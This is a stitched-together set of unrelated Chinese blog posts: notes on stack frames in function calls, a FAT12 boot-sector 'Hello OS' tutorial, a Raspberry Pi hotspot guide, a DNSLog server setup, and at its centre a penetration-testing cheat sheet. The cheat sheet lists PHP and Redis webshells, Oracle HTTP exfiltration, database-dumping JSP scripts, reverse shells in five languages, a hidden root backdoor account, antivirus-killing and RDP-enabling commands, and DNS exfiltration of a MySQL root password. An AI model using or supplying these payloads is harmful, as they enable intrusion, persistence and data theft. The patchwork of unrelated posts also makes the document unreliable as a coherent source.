最近在研究二进制，研究到函数调用部分，将自己理解的原理做个记录。

首先需要了解系统栈的工作原理，栈可以理解成一种先进后出的数据结构，这就不用多说了。
在操作系统中，系统栈也起到用来维护函数调用、参数传递等关系的一个作用。嗯，这是我的理解。
在高级语言编程中，函数调用的底层原理是对用户屏蔽的，所以不用过多的纠结于底层的实现。而对于
汇编研究者来说，了解这个原理就很重要了。
首先可以想象一下，汇编语言在内存中是以指令的形式存在的，这些指令是按照顺序存储和执行的，高级语言中
编写的循环、调用，到了底层都会变成一些最基本的判断和跳转，如何在线性的结构上完成“非线性”的过程调度，
理解了这些，就理解了汇编。

这里先抛出高级语言的一个例子：

1
2
3
4
5
6
7
8
9
10
11
12
13

/*20160701*/
#include <stdio.h>

int funcA( int arg ){
    arg += 1;
    return arg;
}

int main(){
    int a;
    a = funcA(1);
    printf("%d", a);
}

在这个程序中，main函数调用了函数funcA，funcA对传入的数据进行+1然后返回。
这个程序在编译之后，main函数变成这样：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

(gdb) disassemble main
Dump of assembler code for function main:
    0x0000000000400516 <+0>:    push   rbp
    0x0000000000400517 <+1>:    mov    rbp,rsp
    0x000000000040051a <+4>:    sub    rsp,0x10
    0x000000000040051e <+8>:    mov    edi,0x1
    0x0000000000400523 <+13>:call   0x400506 <funcA>
    0x0000000000400528 <+18>:mov    DWORD PTR [rbp-0x4],eax
    0x000000000040052b <+21>:mov    eax,DWORD PTR [rbp-0x4]
    0x000000000040052e <+24>:mov    esi,eax
    0x0000000000400530 <+26>:mov    edi,0x4005d4
    0x0000000000400535 <+31>:mov    eax,0x0
    0x000000000040053a <+36>:call   0x4003e0 <printf@plt>
    0x000000000040053f <+41>:leave  
    0x0000000000400540 <+42>:ret    
End of assembler dump.

其中rbp是调用main函数的函数的栈桢的底部，这么说有点绕，简单的来说，main函数调用了funcA，那funcA中首先要做的一件事情就是把调用它的main函数栈桢的底部保存，所以在main函数被操作系统装载执行之后，main要做的首先是把调用它的函数的栈桢的底部保存，不然怎么返回呢？
第二个步骤把rsp的值传递给rbp，这是替换当前栈桢的底部，因为调用了funcA，所以要为funcA创建独立的栈桢，于是抬高栈底，怎么抬高呢，把栈顶传给指向栈桢底部的指针就可以了。
下一步是抬高栈顶，这是为funcA创建栈桢空间。
接着将参数传递给edi，因为这里只有一个参数，所以不涉及到参数顺序的问题，关于这个问题，可以去了解一下函数调用约定
调用了funcA，再来观察一下funcA的内部机制：

1
2
3
4
5
6
7
8
9
10

(gdb) disassemble funcA
Dump of assembler code for function funcA:
    0x0000000000400506 <+0>:    push   rbp
    0x0000000000400507 <+1>:    mov    rbp,rsp
    0x000000000040050a <+4>:    mov    DWORD PTR [rbp-0x4],edi
    0x000000000040050d <+7>:    add    DWORD PTR [rbp-0x4],0x1
    0x0000000000400511 <+11>:    mov    eax,DWORD PTR [rbp-0x4]
    0x0000000000400514 <+14>:    pop    rbp
    0x0000000000400515 <+15>:    ret    
End of assembler dump.

同样的，在funcA中，首先保存上一个函数，即main函数栈桢的栈底，然后将rsp的值赋给rbp，抬高栈桢底部。
接着从edi中取得参数，并放入位于自身栈桢空间中，rbp之后的双字单元内。
然后执行操作，将其自增。
执行完成之后，将返回值保存在eax中，等待返回。
弹出上一个函数的栈桢的底部，重新回到main函数的空间。

PS：
直到目前为止，这个程序反编译出来的结果和书上说的原理还是有一些出入的，还有下面几个问题：
0x01 书上说的是，传递参数，会将参数按照一定顺序压栈，而不是像本程序中这样使用edi
0x02 在main函数调用funcA函数之后，将栈顶指针esp抬高了，但是在funcA函数执行完成需要返回到main函数的时候，只恢复了ebp指针，并没有恢复esp指针，这是为什么？

希望接下来可以搞懂上面的两个问题。
本文中用到的相关代码：

1
2
3
4
5
6
7
8
9
10
11
12
13
14

/*20160701*/
#include <stdio.h>

int funcA( int arg ){
    arg += 1;
    return arg;
}

int main(){
    int a;
    a = funcA(1);
    printf("%d", a);
}
    

转载自 http://www.tsingfun.com/html/2015/dev_0804/hello_os_word_my_first_os.html

首先阐述下程序运行的基本原理：计算机CPU只执行二进制指令，我们使用的开发语言开发出的程序最终由相应的编译器编译为二进制指令，二进制中包含程序相关的数据、代码指令（用我们最常见的公式描述就是：程序=数据+算法）。CPU读取相应的指令、数据后开始执行，执行后的结果输出到外部设备，如屏幕、磁盘等。整个过程中，CPU发挥最为核心的作用，与其他设备一起完成程序的执行、输出。

OS本身也是程序，它的运行也是如此，开机后从指定地址处（0x7c00），开始执行指令。先看看本节例子最终运行效果：

编译运行环境：
nasm：Inter x86汇编编译工具，用户将我们的汇编代码编译为二进制。
（下载地址 http://www.tsingfun.com/html/2015/soft_0804/nasm_asm.html）
Bochs：运行os的虚拟机工具，模拟加载我们生成的软盘映像，并运行os。
（下载地址 http://www.tsingfun.com/html/2015/soft_0804/Bochs_Lightweight_VirtualMachine.html）

代码如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

;--------------------------------------------------------------
; 平凡OS(Pf OS) 一个最简单的OS
; Author : tsingfun.com
;--------------------------------------------------------------

; FAT12引导扇区
    ORG        0x7c00            ;引导开始地址，固定的，主板BIOS决定，本条指令只是申明，不占字节（有兴趣的可以单独编译这条指令，然后查看二进制，文件0k）
    JMP        _START            ;CPU执行的第一条指令，就是跳转到_START地址处（这里是标签，实际编译后_START是有一个相对地址的）
    TIMES    3-($-$$) NOP    ;NOP：一个机器周期。$:当前地址，$$:首地址。因为以上信息必须占3个字节，所以不足的部分用nop指令填充，
                                ;具体nop占用几个字节请读者使用二进制查看工具自行验证。

    DB        "PFOSBEST"        ; 标识(公司、品牌等)8个字节
    DW        512                ; 每扇区字节数
    DB        1                ; 每簇扇区数
    DW        1                ; Boot内容占几个扇区
    DB        2                ; 共有多少FAT表
    DW        224                ; 根目录文件数最大值
    DW        2880            ; 扇区总数
    DB        0xf0            ; 介质描述符
    DW        9                ; 每FAT扇区数
    DW        18                ; 每磁道扇区数
    DW        2                ; 磁头数(面数)
    DD        0                ; 隐藏扇区数
    DD        2880            ; 若上面“扇区总数”为0，则这个值记录扇区总数
    DB        0,0,0x29        ; 中断13的驱动器号；未使用；拓展引导标记
    DD        0xffffffff        ; 卷序列号
    DB        "PFOS v1.0.0"    ; 卷标(11个字节)
    DB        "FAT12   "        ; 文件系统类型(8个字节)
    ;---------------------------------------------------------------------
    ; 448个字节，引导代码、数据及其他填充字符
    TIMES    18     DB 0

_START:
    MOV        AX, 0            ;AX:累加寄存器，CPU内置的16位寄存器，最为常用，可以用于存储运行的中间结果，此处清零
    MOV        SI, MSG            ;SI:(source index)源变址寄存器，常用来存储待操作的数据的首地址，此处指向数据区的字符串
_LOOP:                        ;循环指令开始
    MOV        AL, [SI]        ;[]取地址中的内容，AL是AX的低8位，所以取8bit，即1字节，字符串的ASCII。
    ADD        SI, 1            ;字符串往后移动一个字节
    CMP        AL, 0            ;判断当前取出的ASCII是否是0,
    JE        _END            ;JE：Equal则Jmp，等于零表示字符串显示完了，结束。
    MOV        AH, 0x0e        ;调用系统10h中断显示ASCII字母，AH,BX指定显示模式及参数(详见：http://www.tsingfun.com/html/2015/dev_0804/570.html)
    MOV        BX, 15
    INT        0x10
    JMP        _LOOP            ;继续下一个字符的显示
_END:
    JMP        $                ;跳到当前的地址，当然就陷入无限循环啦，此处为了让程序停在此处。

;数据区，就是待输出的字符串信息
MSG                        DB    0x0a, "----------------------------------------------", 0x0d, 0x0a, \
                                  "|              Hello, OS World!              |", 0x0d, 0x0a, \
                                  "----------------------------------------------", 0x0d, 0x0a, 0x0

    TIMES     510-($-$$)     DB 0
    DW        0xaa55            ; 结束标志
    ;----------------------------------------------------------------------

; FAT数据区
    DB        0xf0, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00
    TIMES    4600        DB 0
    DB        0xf0, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00
    TIMES    1469432        DB 0

其中，主要的步骤代码中都有详尽的注释，如有任何问题，请移步至论坛《深入OS》板块发帖讨论。

编译执行过程：
打开dos窗口，进入源码所在目录，执行命令nasm boot.asm -o pfos.img：

同目录下生成一个”pfos.img”软盘映像文件，接下来只需要把它装载到虚拟机运行即可，当然有条件的话可以实际写入老式的软盘用真机运行，结果是一样的。

同目录下新建一个 pfos.bxrc Bochs配置文件，内容如下：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

#how much memory the emulated machine will have
megs:4

#filename of ROM images
romimage:file=$BXSHARE\BIOS-bochs-latest,address=Oxf0000
vgaromimage: file=$BXSHARE\VGABIOS-elpin-2.40

#what disk images will be used
floppya:1_44="pfos.IMG",status=inserted

#Choose the boot disk
boot:a

#where do we send log messages?
#log:bochsout.txt

双击“pfos.bxrc”启动Bochs运行即可启动我们自己写的os了。
源码下载：http://www.tsingfun.com/uploadfile/2016/0628/hello os world.zip

接下来解释一下运行原理：

首先，软盘大小是1.44M（这个是固定的），所以我们在程序中指定它为1,474,560 字节，除了程序本身的指令、数据外，不足的部分全部补零。

TIMES 1469432 DB 0 就是此处开始写1469432个字节的0。

软盘采用的是FAT12文件格式，我们现在的常见的文件格式有FAT32、NTFS、EXT3等，FAT12是早期的一种文件格式。文件格式是文件格式化存储的一种算法，比如我们要将一个文件存储到软盘(磁盘)上，有些人可能会想我直接从地址0开始存储，直到结束，那么文件名、文件大小、创建时间等其他信息怎么存？紧接着后面继续存储么？那该给各部分分配多少字节空间？先不说后续查找文件的效率，这种存储方法无章可循会完全失控，是不行的方案。

文件格式化算法就解决了此类问题，而且兼顾文件的高效率查找。基本原理就是给软盘(磁盘)分区：FAT区、目录区、数据区，存储文件时先存储文件基本信息到目录区，然后文件的数据按照一定格式存储到数据区，目录区中有数据区中文件数据的地址。

这里只简单介绍一下FAT12格式，后续篇章会深入解析每个字节代表的含义。

我们来看看我们生成的映像里面到底有什么东西？这时我们需要用到二进制查看工具WinHex，点此下载 http://www.tsingfun.com/html/2015/soft_0804/WinHex.html 。

以上看到的是二进制静态代码，实际运行中各指令的地址都是动态变化的，下来一起借助Bochs的debug功能来一探究竟。
我们双击“pfos.bxrc”默认是以运行模式启动Bochs，实际上我们应该启动bochsdbg.exe，因此写个简单的批处理脚本启动它吧，如下：

1
2
3
4
5
6
7
8
9

@echo off

SET BXSHARE=C:\Program Files (x86)\Bochs-2.5

if %PROCESSOR_ARCHITECTURE% == x86 (
    SET BXSHARE=C:\Program Files\Bochs-2.4.6
)

"%BXSHARE%"\bochsdbg -q -f "pfos.bxrc"

双击脚本，启动debug模式，如下：

Bochs常用的debug命令如下：

1
2
3
4
5
6
7
8
9
10
11
12

b 0x...   断点命令，指定地址处调试
info break  显示当前断点信息
c    继续执行
s    步入执行
n    单步执行
info cpu   查看cpu寄存器（可分别执行 r/fp/sreg/creg）
print-stack   打印堆栈
xp /长度 地址     显示地址处内容（xp:物理地址，x:线性地址）
u 起始地址 结束地址   反汇编一段代码
trace on    反汇编执行的每条指令
trace-reg on   每执行一条指令都打印一下cpu信息
exit   退出调试

大家有兴趣的话可以调试下，然后看看每步骤寄存器值的变化。

总结：本篇主要是让大家对操作系统有个整体概念上的认识，揭开os神秘的面纱，从底层调试到运行，每个过程都真真切切展现在大家面前。至于汇编指令、地址寻址暂时不懂的话，也不要紧，后续章节会继续作详细阐述，力求使大家在不断的运行、调试过程中逐渐熟悉并掌握汇编及计算机底层技术。

最近手上多了一个树莓派2代，于是折腾就这么开始了。
因为总是得要个显示屏或者路由器或者插根网线才能玩，有点麻烦，所以有了此文。

设备清单：

树莓派2代
EDUP EP-N8508GS无线网卡(USB)
普通网线一根

最终实现的效果是树莓派的有线网卡用来作为wan口，无线网卡建立热点
笔记本可以通过连接wifi连接上树莓派进行操作

下面说说过程：
首先我参考了

http://elinux.org/RPI-Wireless-Hotspot

这篇文章中的方法，但是并没有成功。后来看到文章的末尾才知道，是驱动对不上号，文章末尾明确标明默认的hostapd程序不支持rtl8188系列网卡，而我的usb网卡就是rtl8188cus系列。
所以在开始之前，建议先用lsusb命令看一下网卡的型号再考虑进行下一步。

如果你的网卡不是rtl8188系列那你可以参考上面文章中的方法来配置，如果是那么可以参考我的方法。

根据那篇文章最后给出的连接，找到了这个驱动：

https://github.com/lostincynicism/hostapd-rtl8188

然而当编译好驱动重新运行之后仍然是不行，还是不支持。

最后还是参考了这篇文章：

http://wangye.org/blog/archives/845/?_t_t_t=0.7382462719884554

原因可能就是因为我这个系列网卡比较特殊。但是最后在这个文章中发现了编译好的第三方驱动，虽然有点不满意，但还是凑合着用了。
http://www.daveconroy.com/turn-your-raspberry-pi-into-a-wifi-hotspot-with-edimax-nano-usb-ew-7811un-rtl8188cus-chipset/
具体步骤：
先切换为root用户，可以省去很多不必要的麻烦。
所以以下操作都是以root用户：
1.安装hostapd和udhcpd服务并且更换hostapd程序

apt-get install udhcpd hostapd
wget http://www.daveconroy.com/wp3/wp-content/uploads/2013/07/hostapd.zip
unzip hostapd.zip
mv /usr/sbin/hostapd /usr/sbin/hostapd.bak
mv hostapd /usr/sbin/hostapd.edimax
ln -sf /usr/sbin/hostapd.edimax /usr/sbin/hostapd
chown root.root /usr/sbin/hostapd
chmod 755 /usr/sbin/hostapd

2.编辑/etc/udhcpd.conf文件，配置dhcp服务：
确保文件当中有下列内容

start 192.168.1.2
end 192.168.1.254
interface wlan0
remaining yes
opt dns 223.5.5.5 223.6.6.6
opt subnet 255.255.255.0
opt router 192.168.1.1
opt lease 864000 #

相信一般都能看懂，其中的interface需要根据情况来写。
3.编辑/etc/default/udhcpd 文件，将下面这行注释掉。

DHCPD_ENABLED="no"

4.将无线网卡wlan0的ip设为192.168.1.1

ifconfig wlan0 192.168.42.1

5.修改/etc/network/interfaces文件，添加下面的内容

iface wlan0 inet static
  address 192.168.1.1
  netmask 255.255.255.0

并且将下面这两条注释掉

wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet manual

6.接着就正式开始配置无线相关的选项了，编辑/etc/hostapd/hostapd.conf，如果没有这个文件就自行创建它。

interface=wlan0
driver=rtl871xdrv
ssid=无线名称
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=无线密码
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

7.在/etc/default/hostapd文件中指定hostapd服务的配置文件，内容如下

DAEMON_CONF="/etc/hostapd/hostapd.conf"

8.更改系统的转发规则和iptables规则，依次运行下列命令：

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
iptables-save > /etc/iptables.nat
service hostapd start
service udhcpd start
update-rc.d hostapd enable
update-rc.d udhcpd enable

9.最后一点点收尾工作：
编辑/etc/network/interfaces文件，在末尾加上着一条：

up iptables-restore < /etc/iptables.nat

以及/etc/sysctl.conf文件，确保下面的选项存在

net.ipv4.ip_forward=1

到此为止就全部完成了，用手机，电脑等无线设备都可以连接上树莓派了。
为后续的折腾打下基础。

折腾的整个过程还挺复杂的，需要修改多处文件，而且每一处修改都会微妙的影响到最后路由器的运行，小小的改变都有可能造成瘫痪或者影响性能。由此可见，想DIY一款高性能的个性无线路由器还是很有挑战性的。

PHP相关

1
2
3
4
5
6
7
8
9
10
11

<?php copy("http://x.x.x.x/shell.txt", "d:\www\shell.php"); ?>

<?php include "$_GET['_']"; ?>

<?php assert($_POST["1"]);?>

<?php
$url = "http://x.x.x.x/shell.txt";
$contents = file_get_contents($url);
echo $contents;
?> 

Mysql数据库
phpmyadmin爆路径

1

http://url/phpMyAdmin/libraries/select_lang.lib.php

SQL语句导出shell:

1

select "<?php eval($_POST['1']);?>" into outfile 'C:\www\shell.php';

Redis数据库
写shell:

1
2
3
4

config set dir D:\www
config set dbfilename shell.php
set webshell "<?php eval($_POST[x]);?>"
save

Oracle数据库
查数据库ip

1

select sys_context('userenv','ip_address') from dual

通过外连回传数据

1

SELECT UTL_HTTP.request('http://target.com/getdata?data='||TABLE_NAME) FROM USER_TABLES WHERE ROWNUM<=1

查询所有表

1

SELECT * FROM ALL_TABLES

查询当前用户表

1

select table_name from user_tables;

查询所有表按大小排序

1
2

SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc
select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc

查询表前十条

1

select  *   from  users  where  rownum < 10

分页查询 2000000 到 4000000

1

SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000

查询当前编码

1

select userenv('language') from dual;

命令行执行

1

export NLS_LANG="american_america.AL32UTF8"

拖库脚本

JSP1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

<%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin");
File f = new File("/webapps/ROOT/css/t1.txt");
BufferedWriter bw = new BufferedWriter(new FileWriter(f));
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000");
ResultSetMetaData rsmd = rs.getMetaData();
int numberOfColumns = rsmd.getColumnCount();
for(int i=1;i<numberOfColumns+1;i++){
    bw.write(rsmd.getColumnName(i)+",");
}
while (rs.next()){
    for(int i=1;i<numberOfColumns+1;i++){
        bw.write(rs.getString(i)+",");
    }
    bw.newLine();
    bw.flush();
}
out.print(rs);   
%>

JSP2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

<%@ page contentType="text/html;charset=UTF-8"%>
<%@ page import="java.io.*,java.lang.*,java.sql.*"%>
<%
Class.forName("oracle.jdbc.driver.OracleDriver");
Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password");
Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
String html="";
File file = new File("/tmp/data.txt");
BufferedReader br = new BufferedReader(new FileReader(file));
String line;
while ((line = br.readLine()) != null) {
    html=html+"<h3>"+line+":</h3><table border=1><tr>";
    ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100");
    ResultSetMetaData rsmd = rs.getMetaData();
    int numberOfColumns = rsmd.getColumnCount();
    for(int i=1;i<numberOfColumns+1;i++){
        html=html+"<th>"+rsmd.getColumnName(i)+"</th>";
    }
    html+="</tr>";
    while (rs.next()){
        html+="<tr>";
        for(int i=1;i<numberOfColumns+1;i++){
            html=html+"<td>"+rs.getString(i)+"</td>";
        }
        html+="</tr>";
    }
    rs.close();
    html+="<tr></table>";
}
    File f = new File("/tmp/info.css");
    BufferedWriter bw = new BufferedWriter(new FileWriter(f));
    bw.write(html);
    bw.close();
    br.close();
    stmt.close();
    conn.close();
%> 

ColdFusion

1
2
3
4
5
6
7
8
9
10
11
12
13

<CFSET USERNAME="user">
<CFSET PASSWORD="pass">
<CFSET DATABASE="ya_db">
<CFTRY>
<CFQUERY NAME="DATA" DATASOURCE=#DATABASE# USERNAME=#USERNAME# PASSWORD=#PASSWORD#>
SELECT * FROM MEMBER
</CFQUERY>
<CFCATCH Type="Any"></CFCATCH>
</CFTRY>
<CFSAVECONTENT variable="Dump_DATA">
<CFDUMP var="#DATA#" EXPAND="YES" FORMAT="TEXT">
</CFSAVECONTENT>
<cffile action="write" output="#Dump_DATA#" FILE="C:\\RECYCLER\\#USERNAME#_DATA.txt">

反弹shell
bash

1

bash -i >& /dev/tcp/1.1.1.1/1234 0>&1

1

rm -f /tmp/p; mknod /tmp/p p && telnet 1.1.1.1 1234 0/tmp/p

ruby

1

ruby -rsocket -e'f=TCPSocket.open("1.1.1.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

perl

1
2
3
4

perl -e 'use Socket;$i="1.1.1.1";
$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

1
2
3
4
5
6
7

python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("1.1.1.1",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

php

1

php -r '$sock=fsockopen("1.1.1.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Windows取消共享文件夹安全警告

1
2

@echo off
Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f 

kill安全狗3.x

1

ntsd -c q -pn SafeDogGuardCenter.exe

其他
python Simple HTTP服务：

1

python -m SimpleHTTPServer 

Linux相关技巧
压缩目录

1
2
3

zip  -r  root.zip  /root/*
tar -czvf root.tar.gz /root/
tar -cvf  user/tmp/ooouser.tar  user/  --exclude=image --exclude= --exclude *.jpg --exclude *.gif  --exclude *.zip  --exclude *.bmp  --exclude *.eps --exclude *.psd 

添加用户并设置密码

1

useradd -p `openssl passwd -1 -salt 'lsof' admin` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof lsof

收集所有.sh .pl .py .conf .cnf .ini .*history .pass (/usr/share目录里面的除外) 并打包成zip

1

find / \! -path “/usr/share/*” -regex “.*\.sh$\|.*\.pl$\|.*\.py$\|.*\.conf$\|.*\.cnf$\|.*\.ini$\|.*\/\..*history$\|.*\/\..*pass.*” -print|zip pack.zip -@

array_push 后门

1

array_map("ass\x65rt",(array)$_REQUEST['array']);

开启3389端口

1

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

DNSLog，简单来说，就是通过记录对于域名的DNS请求，通过dns请求这个相对“隐蔽”的渠道，来委婉地获取到想要获得的信息。
例如，在一个针对mysql数据库的注入中，如果没有回显，可能很多时候就要歇菜。
但如果对方的数据库服务器连接公网并且是Windows机器的话，就可以用这种姿势来获取信息：

1

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM user WHERE user='root' LIMIT 1),'.nogan.ga\\xxx'))

你将会看到类似：

当然你可能会说直接用http协议传输不就好了吗，确实http协议也可以，但是http协议毕竟有局限的地方，例如容易被防火墙限制等。
而dns作为一种基础协议有时候并不会被随便禁用，一些内网当中对于DNS协议的管控和检测是个薄弱的点，相对http来说DNS协议也更加隐蔽。

近几年DNSLog被尤其广泛地运用于无回显的SQL注入、命令执行、XML实体注入等漏洞的检测当中，算是一门很基础的老技术了。

关于DNSLog的具体应用，这里就不多说了，感兴趣的可以进一步阅读以下文章：

1
2
3
4
5

https://www.anquanke.com/post/id/98096

http://www.freebuf.com/column/158579.html

https://www.cnblogs.com/afanti/p/8047530.html

那么如何低成本搭建dnslog服务器？接下来就来简要分享一个低成本构建DNSLog服务的方法。

准备材料：

(1) 一台低成本的VPS：这里推荐使用某国外的便宜VPS，完整root权限，单核512MB/10GSSD，￥128/年，购买链接在文章最后
(2) 一个可以接收邮件的邮箱：用来注册免费域名

搭建过程

注册域名

首先到 https://freenom.com 注册用户，同时注册一个免费的域名
以我这里为例，注册一个nogan.ga

注册的时候，在DNS选项中，选择使用自己的DNS，新建DNS服务器的地址，例如我这里自定义了两个dns服务器，分别是
ns0.nogan.ga和ns1.nogan.ga，并且将他们的地址指向我的VPS服务器。

点击Continue，进入到结算页面。
如果你上一步没有注册用户，那么可以直接在这里填你用来注册用户的邮箱，然后根据指引进行操作。
如果注册了用户，只需要直接登录就可以了。

进入到Review and Checkout页面，填入一些你的基本信息就可以了

这里记得勾选Lock profile，你的信息就不会被whois查询到了。

接着下一步，勾选Complate Order，域名就注册成功了。

部署DNS服务

登录你的VPS服务器，运行下面这个python脚本，将在你的VPS主机监听UDP 53端口，并且回复DNS响应包：

记得修改IP地址和NS域名，在最后。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date    : 2014-06-29 03:01:25
# @Author  : Your Name ([email protected])
# @Link    : http://example.org
# @Version : $Id$

import SocketServer
import struct
import socket as socketlib
# DNS Query
class SinDNSQuery:
    def __init__(self, data):
        i = 1
        self.name = ''
        while True:
            d = ord(data[i])
            if d == 0:
                break;
            if d < 32:
                self.name = self.name + '.'
            else:
                self.name = self.name + chr(d)
            i = i + 1
        self.querybytes = data[0:i + 1]
        (self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])
        self.len = i + 5
    def getbytes(self):
        return self.querybytes + struct.pack('>HH', self.type, self.classify)



# DNS Answer RRS
# this class is also can be use as Authority RRS or Additional RRS 
class SinDNSAnswer:
    def __init__(self, ip):
        self.name = 49164
        self.type = 1
        self.classify = 1
        self.timetolive = 190
        self.datalength = 4
        self.ip = ip

    def getbytes(self):
        res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)
        s = self.ip.split('.')
        res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3]))
        return res

# DNS frame
# must initialized by a DNS query frame
class SinDNSFrame:
    def __init__(self, data):
        (self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])
        self.query = SinDNSQuery(data[12:])

    def getname(self):
        return self.query.name

    def setip(self, ip):
        self.answer = SinDNSAnswer(ip)
        self.answers = 1
        self.flags = 33152

    def getbytes(self):

        res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)
        res = res + self.query.getbytes()
        if self.answers != 0:
            res = res + self.answer.getbytes()
        return res

# A UDPHandler to handle DNS query
class SinDNSUDPHandler(SocketServer.BaseRequestHandler):
    def handle(self):
        data = self.request[0].strip()
        dns = SinDNSFrame(data)
        socket = self.request[1]
        namemap = SinDNSServer.namemap
        if(dns.query.type==1):
            # If this is query a A record, then response it
            name = dns.getname();
            toip = None
            ifrom = "map"
            if namemap.__contains__(name):
                # If have record, response it
                # dns.setip(namemap[name])
                # socket.sendto(dns.getbytes(), self.client_address)
                toip = namemap[name]
            elif namemap.__contains__('*'):
                # Response default address
                # dns.setip(namemap['*'])
                # socket.sendto(dns.getbytes(), self.client_address)
                toip = namemap['*']
            else:
                # ignore it
                # socket.sendto(data, self.client_address)
                # socket.getaddrinfo(name,0)
                try:
                    toip = socketlib.getaddrinfo(name,0)[0][4][0]
                    ifrom = "sev"
                    # namemap[name] = toip
                    # print socket.getaddrinfo(name,0)
                except Exception, e:
                    print 'get ip fail'
            if toip:
                dns.setip(toip)

            print '%s: %s-->%s (%s)'%(self.client_address[0], name, toip, ifrom)
            socket.sendto(dns.getbytes(), self.client_address)
        else:
            # If this is not query a A record, ignore it
            socket.sendto(data, self.client_address)

# DNS Server
# It only support A record query
# user it, U can create a simple DNS server
class SinDNSServer:
    def __init__(self, port=53):
        SinDNSServer.namemap = {}
        self.port = port

    def addname(self, name, ip):
        SinDNSServer.namemap[name] = ip

    def start(self):
        HOST, PORT = "0.0.0.0", self.port
        server = SocketServer.UDPServer((HOST, PORT), SinDNSUDPHandler)
        server.serve_forever()

# Now, test it
if __name__ == "__main__":
    sev = SinDNSServer()
        sev.addname('ns0.nogan.ga','x.x.x.x') 
        sev.addname('ns1.nogan.ga','x.x.x.x')
        sev.addname('www.nogan.ga','y.y.y.y')
        sev.addname('*', '127.0.0.1') # default address

    sev.start() # start DNS server

将上面的ns0.nogan.ga和ns1.nogan.ga改成你的域名，并且将x.x.x.x改成你的VPS服务器地址。
如果你在搭建DNSLog的同时还想顺便搭建一个网站的话，可以添加一个www记录，指向你的web服务器地址。
星号是将任意地址执行127.0.0.1，这样你的DNSLog请求记录，都会被默认解析到127.0.0.1。

接着在服务器上运行

1

python dns.py

在任意机器上面ping xxxxx.YOURDOMAIN：

可以在VPS上观察到请求已经过来了

但这个时候程序是一直在控制台运行的，想要退出怎么办呢，用nohup将程序改为背景运行：

想要关闭的话，先查看端口并获取进程号，然后kill即可：

Enjoy it~

附：

搬瓦工VPS优惠地址 （推荐 $19.99/年，约合RMB￥128）：

https://bandwagonhost.com/cart.php
可能要扶梯 = =

1、Linux 基础
安装Linux操作系统

Linux文件系统

Linux常用命令

Linux启动过程详解

熟悉Linux服务能够独立安装Linux操作系统

能够熟练使用Linux系统的基本命令

认识Linux系统的常用服务安装Linux操作系统

Linux基本命令实践

设置Linux环境变量

定制Linux的服务

Shell 编程基础使用vi编辑文件

